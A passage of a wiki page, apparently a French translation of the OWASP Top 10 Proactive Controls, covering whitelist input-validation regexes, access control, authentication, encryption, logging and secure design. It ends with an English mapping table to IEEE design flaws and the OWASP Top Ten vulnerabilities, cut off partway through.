Il existe deux approches classiques pour effectuer une validation des données entrantes : par "liste blanche" et par "liste noire". La "liste blanche" cherche à définir à quoi ressemble une donnée valide. Toute donnée qui ne répond pas à la définition “good input” devra être refusée. La validation par “liste noire” s’efforce de détecter et de repousser les attaques connues ainsi que rejeter les caractères connus non conformes. Cette méthode de “liste noire” conduit plus facilement à des erreurs de validation et est plus difficile à maintenir car elle peut parfois être contournée par l'encodage et diverses techniques d'obfuscation. Elle doit aussi être continuellement mise à jour pour prendre en compte la découverte de nouvelles attaques et techniques d’encodage. En raison de ces faiblesses, elle n'est pas recommandée lors de la création d'une application web sécurisée. Les exemples suivants se concentreront donc sur l'utilisation de la liste blanche.<br />
<br />
Lorsqu’un utilisateur s'enregistre pour la première fois sur une application web, les premières informations qui lui sont demandées sont un nom d'utilisateur, un mot de passe et une adresse e-mail. Si ces données proviennent d'un utilisateur malveillant, celles-ci peuvent contenir des chaînes d'attaques. En validant chaque données entrantes et en s'assurant qu'elles ne contiennent uniquement qu’un jeu de données validé, nous pouvons rendre l'attaque de cette application plus compliquée.<br />
<br />
Commençons avec l'expression régulière suivante pour le nom d'utilisateur.<br />
^[a-z0-9_]{3,16}$<br />
<br />
Avec la méthode de validation par liste blanche, cette expression régulière accepte uniquement les lettres minuscules, les chiffres et le caractère underscore. Dans cet exemple, la taille du nom d'utilisateur est également limitée de 3 à 16 caractères.<br />
<br />
Ci-dessous, un exemple d’expression régulière pour le mot de passe.<br />
^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%]).{10,64}$<br />
<br />
Cette expression régulière s'assure que le mot de passe à une longueur comprise entre 10 et 64 caractères et contient au moins une lettre majuscule, une lettre minuscule, un chiffre et un caractère spécial (&, #, $ ou % présent une ou plusieurs fois).<br />
<br />
Ci-après, un exemple d’expression régulière pour une adresse e-mail (selon la spécification HTML5)<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]+)*$<br />
<br />
Dans certains cas spéciaux, la validation par expression régulière n’est pas suffisante. En effet, si votre application manipule des balises - des données entrantes non fiables pouvant contenir du HTML - il peut vite devenir très difficile d’effectuer une validation. L'encodage peut également être compliqué, puisqu'il casserait toutes les balises appartenant à la donnée entrante. Dans ce genre de cas, vous avez besoin d’une librairie qui parse et nettoie le HTML comme l'OWASP Java HTML Sanitizer. Les expressions régulières ne sont pas la bonne méthode pour parser et nettoyer le HTML non-fiable.<br />
<br />
Nous mettons en avant ici une évidence malheureuse de la validation des données entrantes : la validation des entrées ne rends pas forcément sûr une donnée non-fiable, puisqu'il peut être nécessaire d'accepter des caractères potentiellement dangereux comme étant des données valides. La sécurité de l'application devrait donc par la suite être renforcée là où cette entrée est exploitée. Par exemple, si la donnée entrante est utilisée pour construire une réponse HTML, l'encodage approprié du HTML doit être ensuite effectué pour prévenir les attaques de type Cross Site Scripting.<br />
<br />
'''Principales références'''<br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Outils principaux'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br/><br />
== 4: Implémenter les contrôles d'accès appropriés ==<br />
<br />
Le Contrôle d’Accès est le processus par lequel les demandes d'accès à un élément ou à une ressource précise sont accordées ou refusées. Il convient de noter que le Contrôle d’Accès n'est pas équivalent à l'authentification (vérification de l'identité). Ces termes et leurs définitions sont souvent confondus. <br />
<br />
Le Contrôle d’Accès est une sécurité qui peut être relativement complexe mais de conception robuste. C’est lors des premières étapes de développement d’une application que devraient être étudiés les principes “positifs” suivants de conception de contrôle d’accès. En effet, une fois que vous avez choisi un modèle spécifique de conception de contrôle d'accès, il est souvent difficile et consommateur de temps de le remplacer au sein de votre application par un nouveau modèle. Le Contrôle d'Accès est l'un des domaines principaux de la conception de la sécurité d'une application et doit être pensé le plus tôt possible.<br />
<br />
===Forcer les contrôles d'accès pour toutes les requêtes===<br />
Dans la plupart des frameworks et des langages, l'accès à une fonctionnalité est réalisé seulement si le développeur la met en place. Avec une vision inverse, centrée sur la sécurité, tous les accès seraient vérifiés par défaut. Pensez donc à utiliser un filtre ou tout autre mécanisme automatique pour vous assurer que l'ensemble des requêtes passent par des contrôles d'accès.<br />
<br />
===Tout refuser par défaut===<br />
Pour continuer avec la validation automatique par les contrôles d’accès, il est crucial d’interdire l’ensemble des accès aux fonctionnalités qui n’ont pas encore de contrôles d’accès configurés. Et pourtant, ce n’est pas cela qui est appliqué, mais bien l’inverse. Les nouvelles fonctionnalités créées sont accessibles sans restriction jusqu'à ce qu'un développeur y ajoute un contrôle d'accès.<br />
<br />
===Eviter de coder en dur les règles des contrôles d'accès===<br />
Fréquemment, la politique de contrôle d'accès est codée en dur dans le code de l'application. Cela rend très difficile les audits et tests de sécurité de l'application et est consommateur de temps. La politique de contrôle d'accès et le code de l'application doivent être séparés le plus possible. En d'autres termes, votre couche d'application (contrôles du code) et votre processus de prise de décision sur vos contrôles d'accès (le "moteur" des contrôles d'accès) doivent être séparés le plus possible.<br />
<br />
===Coder pour les fonctionnalités===<br />
La plupart des frameworks web utilisent les rôles dans les contrôles d'accès comme méthode principale de vérification des points de passages dans le code de l'application. S’il est acceptable d'utiliser les rôles dans les mécanismes de contrôle d'accès, écrire un code spécifique à un rôle dans votre application est un contre-modèle. Dans le code source, il est préférable de vérifier qu'un utilisateur a accès à une fonctionnalité, plutôt que de vérifier qu'un utilisateur appartient à un rôle.<br />
<br />
===Les données sûres côté serveur doivent piloter les contrôles d'accès===<br />
La plupart des données dont vous avez besoin pour prendre une décision sur un contrôle d'accès (qui est l'utilisateur et est-il identifié ?, quels sont les droits de l'utilisateur ?, quelle est la politique de contrôle d'accès ?, quelles fonctionnalité et données sont demandées ?, quelle heure est-il ?, quelle est la géolocalisation ?, etc...) doit être récupérée "côté serveur" dans une application web standard ou un service Web. La politique de données, telle que le rôle d'un utilisateur ou une règle de contrôle d'accès, ne devrait jamais faire partie de la requête. Dans une application Web standard, les seules données côté client qui sont nécessaires pour effectuer un contrôle d'accès sont l'identifiant ou les identifiants des données à accéder. Toutes les autres données nécessaires pour prendre une décision sur un contrôle d'accès doivent être récupérées côté serveur.<br />
<br />
'''Principales références'''<br />
* [[Access Control Cheat Sheet]]<br />
* [http://cybersecurity.ieee.org/center-for-secure-design/authorize-after-you-authenticate.html http://cybersecurity.ieee.org/center-for-secure-design/authorize-after-you-authenticate.html]<br />
<br />
'''Outils principaux'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br/><br />
== 5: Définir les contrôles d'identités et d'authentification ==<br />
<br />
L'authentification est le processus consistant à vérifier qu'une personne ou une entité est bien celui qu'elle prétend être. L'authentification est généralement réalisée en soumettant un nom d'utilisateur ou un identifiant et une ou plusieurs informations privées que seul un utilisateur donné doit connaître.<br />
<br />
La gestion des sessions est un processus par lequel un serveur conserve l'état d'une entité interagissant avec lui. Dans les transactions, cela permet au serveur de se souvenir comment réagir aux demandes ultérieures. Les sessions sont maintenues sur le serveur par un identifiant de session qui peut être transmis dans les deux sens entre le client et le serveur lors de la transmission et la réception de requêtes. L'identifiant de session devrait être unique par utilisateur et son calcul impossible à prédire.<br />
<br />
La gestion des identités est un sujet plus vaste qui ne comprend pas seulement la gestion de l'authentification et des sessions, mais couvre également des thèmes avancés tels que la fédération d'identité, l'authentification unique, les outils de gestion de mots de passe, les référentiels d'identités et plus encore.<br />
<br />
'''Principales références'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br/><br />
== 6: Protéger les données et la vie privée ==<br />
<br />
=== Cryptage les données transmises ===<br />
<br />
Lors de la transmission de données sensibles, à tous les niveaux de votre application ou de l'architecture réseau, il est nécessaire de penser à l'encryption des données. SSL / TLS est de loin le modèle de cryptage des données transmises le plus utilisé par les applications Web. Malgré les faiblesses publiées sur certaines implémentations spécifiques (par exemple Heartbleed), il est encore, dans les faits, la méthode recommandée pour la mise en oeuvre d'un cryptage de la couche de transport.<br />
<br />
'''Principales références'''<br />
* Configuration TLS/SSL: [[Transport Layer Protection Cheat Sheet]]<br />
* Protéger les utilisateurs d’une attaque man-in-the-middle au travers de certificats SSL frauduleux: [[Pinning Cheat Sheet]]<br />
<br />
=== Cryptage des données stockées ===<br />
<br />
Il est difficile de mettre en place un stockage crypté sécurisé. Il est essentiel de classer les données dans votre système et de déterminer lesquelles doivent être encryptées, par exemple il est nécessaire de crypter les cartes de crédit avec la norme de conformité PCI. De plus, chaque fois que vous commencez à construire vos propres fonctions cryptographiques de bas niveau dans votre application, vous devez vous assurer que vous êtes ou êtes assisté d'un expert dans ce domaine. Au lieu de construire des fonctions cryptographiques en partant de zéro, il est fortement recommandé de regarder et d'utiliser une bibliothèque open source, comme le projet Google KeyCzar, Bouncy Castle et les fonctions incluses dans le SDK. Également, vous devez être préparé à gérer les aspects les plus difficiles de la cryptographie appliquée comme la gestion des clés, la conception de l'ensemble de l'architecture cryptographique ainsi que les questions relatives à la hiérarchisation et la politique de confiance dans un logiciel complexe.<br />
<br />
Lors du chiffrement de données stockées, une erreur fréquente est d'utiliser une clé inadéquate, ou de stocker la clé avec les données chiffrées (l'équivalent cryptographique de laisser une clé sous le paillasson). Les clés doivent être traités comme confidentiel et n'exister sur les appareils que dans un état transitoire. Par exemple, saisie par l'utilisateur pour que les données puissent être décryptées, puis effacée de la mémoire.<br />
<br />
'''Principales références'''<br />
* Informations relatives aux décisions basiques nécessaires pour le chiffrement des données stockées: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Outils principaux'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
* [https://code.google.com/p/keyczar/ Google KeyCzar]<br />
<br />
=== Implémenter une protection pendant le traitement ===<br />
<br />
Assurez-vous que les données confidentielles ou sensibles ne soient pas exposées par accident au cours du traitement. Elles pourraient être plus facilement accessible en mémoire, ou bien dans des espaces de stockages temporaires, ou encore dans des fichiers de log, des endroits où un attaquant pourrait les retrouver et les lire.<br />
<br/><br />
== 7: Implémenter la journalisation, la gestion d'erreurs et la détection d'intrusion ==<br />
<br />
La mise en oeuvre de la journalisation ne devrait pas être pensée après coup et limitée au débogage ou à la résolution des problèmes. Elle est également utilisée dans d’autres activités sensibles :<br />
<br />
* La surveillance des applications<br />
* Analyse et compréhension des affaires<br />
* Les activités d’audit et de vérification de la conformité<br />
* La détection d’intrusion dans les systèmes<br />
* Informatique légale (Forensics)<br />
<br />
Pour faciliter les rapports et l’analyse, il est important de suivre une approche commune de journalisation à l’intérieur même d’un système mais aussi entre différents systèmes lorsque cela est possible. Pour cela, l’utilisation d’un framework de journalisation extensible tel que SLF4J avec Logback ou Apache Log4j2, permet de veiller à ce que toutes les entrées du journal soient compatibles. <br />
<br />
La surveillance des processus, l'audit, les journaux de transactions, etc. sont généralement collectées à des fins différentes de celles de la journalisation des événements de sécurité, et cela signifie souvent qu'ils doivent être séparés. De plus, les formats et le détail des événements recueillis ont tendance à être différents. Par exemple, un journal d'audit PCI DSS contiendra également un registre chronologique des activités qui fournit une trace vérifiable de façon indépendante. Cela permettra la reconstruction, l’évaluation et l'examen avec comme finalité de déterminer l'ordre d'origine des opérations imputables.<br />
<br />
Il est important de trouver le juste milieu de journalisation, ni trop ni pas assez. Veillez à toujours mettre un horodatage dans vos journaux, ainsi que des informations d’identification telles que les adresses IP sources et les identifiants utilisateurs, mais n’enregistrez jamais de données confidentielles ou privées. Utilisez vos connaissances du métier pour vous aider à déterminer quoi, quand et comment journaliser. Pour vous prémunir contre l'injection de journaux de log (également appelé Log Forging / Forgeage de log), veillez à encoder les données non sécurisées avant de les journaliser.<br />
<br />
Le projet [[OWASP AppSensor Project]] décrit comment mettre en œuvre la détection d'intrusion et les réponses automatisées dans le cadre d’une application existante: où ajouter les sondes ou les points de détection, les mesures/actions à prendre en cas de problèmes de sécurité rencontrés dans votre application.<br />
<br />
'''Principales références'''<br />
* Comment implémenter correctement la journalisation dans vos applications: [[Logging Cheat Sheet]]<br />
<br />
'''Outils principaux'''<br />
* [[OWASP AppSensor Project]]<br />
<br/><br />
== 8: Tirer parti des fonctionnalités de sécurité des frameworks et bibliothèques de sécurité ==<br />
<br />
Développer des contrôles de sécurité pour une application web, un service web ou une application mobile en partant de zéro est une perte de temps et peut générer des failles de sécurité importantes. Les bibliothèques de sécurité permettent d'éviter aux développeurs de logiciels les défauts de conception et de créer ces failles.<br />
<br />
Lorsque cela est possible, le choix devrait se porter sur l'utilisation des fonctionnalités existantes dans les frameworks plutôt que d'importer des librairies externes. En effet, il est préférable que les développeurs profitent de ce qu'ils utilisent déjà au lieu d'ajouter une librairie de plus à leur application. Les frameworks de sécurité des applications Web à utiliser peuvent être :<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
Il est essentiel de garder ces frameworks et bibliothèques à jour comme décrit dans le chapitre "Utilisation de composants avec des vulnérabilités connues" du document Owasp Top Ten 2013. <br />
<br />
'''Principales références'''<br />
* [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br/><br />
== 9: Inclure les exigences de sécurité spécifiques ==<br />
<br />
Au début d'un projet de développement logiciel, trois catégories principales d'exigences de sécurité peuvent être définies:<br />
<br />
1) Éléments et fonctions de sécurité : les contrôles de sécurité visibles de l'application, incluant l'authentification, les contrôle d'accès et les fonctions d'audit. Ces exigences de sécurité sont souvent définies par des cas d'utilisation ou des cas utilisateur qui incluent l'entrée, le comportement et la sortie, et peuvent ainsi être revues et testées pour vérifier le bon fonctionnement par l’équipe AQ. Par exemple, vérifier la réauthentification lors du changement de mot de passe ou s'assurer que les modifications de certaines données ont été correctement journalisées.<br />
<br />
2) Cas d'abus de la logique métier : les fonctionnalités de la logique métier comprennent plusieurs workflows multi-branches et multi-étapes qui sont difficiles à évaluer dans leur intégralité et peuvent impliquer de l'argent ou des objets de valeur, des informations d'identification utilisateur, des informations privées ou des fonctions de contrôle / commande. Par exemple, les workflows de commerce électronique, de choix de trajets des navires, ou la validation de transfert bancaire. Les cas utilisateur ou les cas d'utilisation de ces exigences doivent inclure des scénarios d'exceptions et de défaillances (qu'arrive-t-il si une étape échoue / expire ou si l'utilisateur tente d'annuler ou de répéter une étape ?). Il en est de même pour les exigences qui découlent de "cas d'abus". Les cas d'abus décrivent la façon dont les fonctions de l'application pourraient être détournées par des attaquants. L’utilisation de scénarios de défaillances et de cas d'abus permet de découvrir les faiblesses dans la validation et le traitement des erreurs qui impacteront la fiabilité et la sécurité de l'application.<br />
<br />
3) Classification des données et exigences de confidentialité : les développeurs doivent toujours être conscients de la présence d'informations personnelles ou confidentielles sur le système et s'assurer que celles-ci sont protégées. Quelle est la source des données ? La source est-elle de confiance ? Où sont stockées / affichées les données ? Celles-ci doivent-elles être stockées ou affichées ? Qui est autorisé à les créer, les voir, les modifier, et ces actions sont-elles journalisées ? Tout cela conduira à la nécessité d'avoir une validation de données, des contrôles d'accès, des chiffrements, des audits et une journalisation des contrôles sur le système.<br />
<br />
'''Principales références'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br/><br />
== 10: Conception et architecture de sécurité ==<br />
<br />
Il existe plusieurs domaines pour lesquels il est nécessaire de se préoccuper de la sécurité lors de l'architecture et de la conception d'un système. Ceux-ci comprennent:<br />
<br />
1) Connaître vos outils : Vos choix de langage(s) et de plate-formes (OS, serveur web, messagerie, base de données ou gestionnaire de données NoSQL) entraîneront des risques et des réflexions de sécurité spécifiques aux technologies que l'équipe de développement devra comprendre et gérer.<br />
<br />
2) Hiérarchisation, confiance et dépendances : Une autre partie importante de l'architecture et de la conception sécurisées est la hiérarchisation et la confiance. Décider quel contrôle doit être appliqué au client, à la couche Web, à la couche de logique métier, à la couche de gestion des données, et où établir la confiance entre les différents systèmes ou différentes parties d'un même système. La frontière de confiance situe l'endroit où prendre des décisions à propos de l'authentification, du contrôle d'accès, de la validation des données ou encore de l'encodage, du cryptage et de la journalisation. La frontière de confiance situe l'endroit où prendre les décisions à propos de l'authentification, du contrôle d'accès, de la validation des données ou encore de l'encodage, du cryptage et de la journalisation. On peut avoir confiance dans les données, sources de données et services à l'intérieur de la frontière de confiance mais pas pour tout ce qui se situe en dehors. Lors de la conception ou de la modification de la conception d'un système, assurez-vous de bien comprendre les principes de confiance, assurez-vous que ces principes soient toujours valides, et assurez-vous qu'ils soient respectés.<br />
<br />
3) Gérer la surface d'attaque : Soyez conscient de la Surface d'Attaque du système, la façon dont les attaquants peuvent rentrer dans le système et les données qu'ils peuvent récupérer. Sachez reconnaître quand vous augmentez cette Surface d'Attaque, et profitez-en pour réaliser des évaluations des risques (devez-vous faire la modélisation des menaces ou planifier un test supplémentaire). Introduisez-vous une nouvelle API ou modifiez-vous une fonction de sécurité à haut risque du système, ou ajoutez-vous seulement un nouveau champ à une page ou fichier existant?<br />
<br />
'''Principales références'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Top Ten Mapping =<br />
<br />
<br />
== Overview ==<br />
Most developers have heard about the OWASP Top Ten, the list of the 10 Most Critical Web Application Security Vulnerabilities which should be avoided in web applications. <br />
However, in order to avoid them, developers must be aware of the pro-active controls in order to incorporate from the early stages of software development lifecycle. <br />
<br />
This documents starts from the OWASP Top Ten Proactive Controls, shortly describes them, and then provides a mapping to the OWASP Top Ten vulnerabilities each of them will address. <br />
<br />
{| width="100%" cellpadding="7" cellspacing="0"<col width="325"><col width="316"><br />
! ead | <br />
|- valign="top"<br />
| width="50%" bgcolor="#d9d9d9" style="border: 1.00pt solid #000001; padding: 0.18cm" | '''OWASP Top 10 Proactive Control'''s <br />
| width=“50%” bgcolor="#d9d9d9" style="border: 1.00pt solid #000001; padding: 0.18cm" | '''IEEE Top 10 Software Security Design Flaws''' <br />
| width=“50%” bgcolor="#d9d9d9" style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Which OWASP Top 10 Vulnerabilities will prevent?''' <br />
<br />
<br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
'''OWASP-C1: Parameterize Queries'''<br />
<br />
<font size="2" style="font-size: 9pt"><br />
The Parameterized queries are a way to leverage to Data Access Abstraction Layer how parameters are interpreted before executing an SQL query. It provides SQL injection protection.<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;1 Earn or give, but never assume, trust<br />
<br />
:''Designs that place authorization, access control, enforcement of security policy, or embedded sensitive data in client software thinking that it won't be discovered, modified, or exposed by clever users or malicious attackers are inherently weak.'' <br />
</font><br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="3" style="font-size: 12pt">'''Prevents :''' </font><br />
<font size="2" style="font-size: 9pt"><br />
; A1 Injection <br />
: ''Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query.'' <br />
</font><br />
<br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" |<br />
'''OWASP-C2: Encode Data'''<br />
<br />
<font size="2" style="font-size: 9pt">Encode data before use in a parser ( JS, CSS , XML ) <br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;1 Earn or give, but never assume, trust<br />
<br />
:''Designs that place authorization, access control, enforcement of security policy, or embedded sensitive data in client software thinking that it won't be discovered, modified, or exposed by clever users or malicious attackers are inherently weak.'' <br />
<br />
;4 Strictly separate data and control instructions, and never process control instructions received from untrusted sources<br />
<br />
:''Combining data and control instructions in a single entity, especially a string, can lead to injection vulnerabilities.'' <br />
<br />
:''Software systems and components commonly make assumptions about data they operate on. It is important to explicitly ensure that such assumptions hold: Vulnerabilities frequently arise from implicit assumptions about data, which can be exploited if an attacker can subvert and invalidate these sumptions.'' <br />
<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents :'''<br />
<br />
<font size="2" style="font-size: 9pt"><br />
; A1 Injection <br />
: ''Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query.''<br />
; A3 XSS<br />
: ''XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites''<br />
</font><br />
<br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
'''OWASP-C3: Validate All Inputs'''<br />
<br />
<font size="2" style="font-size: 9pt"><br />
Consider all input from outside of the application as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be manipulated by an attacker. <br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;1 Earn or give, but never assume, trust<br />
<br />
:''Designs that place authorization, access control, enforcement of security policy, or embedded sensitive data in client software thinking that it won't be discovered, modified, or exposed by clever users or malicious attackers are inherently weak.'' <br />
<br />
;5 Define an approach that ensures all data are explicitly validated<br />
<br />
:''Software systems and components commonly make assumptions about data they operate on. It is important to explicitly ensure that such assumptions hold: Vulnerabilities frequently arise from implicit assumptions about data, which can be exploited if an attacker can subvert and invalidate these sumptions.'' <br />
<br />
</font><br />
<br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents :'''<br />
<br />
<font size="2" style="font-size: 9pt"><br />
; A1 Injection <br />
: ''Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query''<br />
; A3 XSS<br />
: ''XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites''<br />
; A10-Unvalidated Redirects and Forwards<br />
</font><br />
<br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" |<br />
'''OWASP-C4: Implement Appropriate Access Controls'''<br />
<br />
<font size="2" style="font-size: 9pt"><br />
Authorization (Access Control) is the process where requests to access a particular feature or resource should be granted or denied. <br />
<br />
<br />
The following "positive" access control design requirements should be considered at the initial stages of application development:<br />
* Force all requests to go through access control checks<br />
* Deny by default<br />
* Avoid hard-coded policy-based access control checks in code<br />
* Check on the server when each function is accessed<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;3 Authorize after you authenticate<br />
<br />
:''Authorization should be conducted as an explicit check, and as necessary even after an initial authentication has been completed.'' <br />
<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents:'''<br />
<br />
<font size="2" style="font-size: 9pt"><br />
; A4-Insecure Direct Object References<br />
: ''A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data''. <br />
; A7-Missing Function Level Access Control<br />
: ''Applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization''<br />
</font><br />
<br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<br />
'''OWASP-C5: Establish Identity and Authentication Controls'''<br />
<br />
<font size="2" style="font-size:9pt"><br />
Authentication is the process of verifying that an individual or an entity is who it claims to be while identity management is a broader topic which not only includes authentication, session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;2 Use an authentication mechanism that cannot be bypassed or tampered with<br />
<br />
:''The ability to bypass an authentication mechanism can result in an unauthorized entity having access to a system or service that it shouldn't.'' <br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents:'''<br />
<br />
<font size="2" style="font-size: 9pt"><br />
; A2-Broken Authentication and Session Management<br />
: Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.<br />
</font><br />
<br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
'''OWASP-C6: Protect Data and Privacy'''<br />
<br />
<font size="2" style="font-size: 9pt">Data encryption at rest or transit <br />
<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;6 Use cryptography correctly<br />
<br />
:''Cryptography is one of the most important tools for building secure systems.'' <br />
<br />
;7 Identify sensitive data and how they should be handled<br />
<br />
:''Data are critical to organizations and to users. One of the first tasks that systems designers must do is identify sensitive data and determine how to protect it appropriately. Many employed systems over the years have failed to protect data appropriately. This can happen when designers fail to identify data as sensitive, or when designers do not identify all the ways in which data could be manipulated or exposed.'' <br />
<br />
<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents:''' <br />
<font size="2" style="font-size: 9pt"><br />
; A6-Sensitive Data Exposure<br />
: ''Sensitive data needs extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.''<br />
</font><br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''OWASP-C7: Implement Logging, Error Handling and Intrusion Detection'''<br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;10 Be flexible when considering future changes to objects and actors<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents:'''<br />
<font size="2" style="font-size: 9pt"><br />
; A1-Injection<br />
; A2-Broken Authentication and Session Management<br />
; A3 XSS<br />
; A4-Insecure Direct Object References<br />
; A5-Security Misconfiguration<br />
; A6-Sensitive Data Exposure<br />
; A7-Missing Function Level Access Control<br />
; A8-Cross-Site Request Forgery (CSRF) <br />
; A9-Using Components with Known Vulnerabilities<br />
; A10-Unvalidated Redirects and Forwards<br />
</font><br />
|- valign="top"<br />
| width=“50%”bgcolor="#ffffff" style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
'''OWASP-C8: Leverage Security Features of Frameworks and Security Libraries'''<br />
<br />
<font size="2" style="font-size: 9pt">Starting from scratch when it comes to developing security controls leads to wasted time and massive security holes. Secure coding libraries help developers guard against security-related design and implementation flaws.<br />
It is critical to keep these frameworks and libraries up to date.<br />
<br />
For example:<br />
* Choose a good database ORM <br />
* Choose a framework with already build-in good access control <br />
* Choose a framework that already has integrated CSRF<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;1 Earn or give, but never assume, trust<br />
<br />
;2 Use an authentication mechanism that cannot be bypassed or tampered with<br />
<br />
;3 Authorize after you authenticate<br />
<br />
;4 Strictly separate data and control instructions, and never process control instructions received from untrusted sources<br />
<br />
;5 Define an approach that ensures all data are explicitly validated<br />
<br />
;6 Use cryptography correctly<br />
<br />
;7 Identify sensitive data and how they should be handled <br />
<br />
;8 Always consider the users <br />
<br />
;9 Understand how integrating external components changes your attack surface <br />
<br />
;10 Be flexible when considering future changes to objects and actors<br />
<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents:''' <br />
<font size="2" style="font-size: 9pt"><br />
; A1-Injection<br />
; A2-Broken Authentication and Session Management<br />
; A3 XSS<br />
; A4-Insecure Direct Object References<br />
; A5-Security Misconfiguration<br />
; A6-Sensitive Data Exposure<br />
; A7-Missing Function Level Access Control<br />
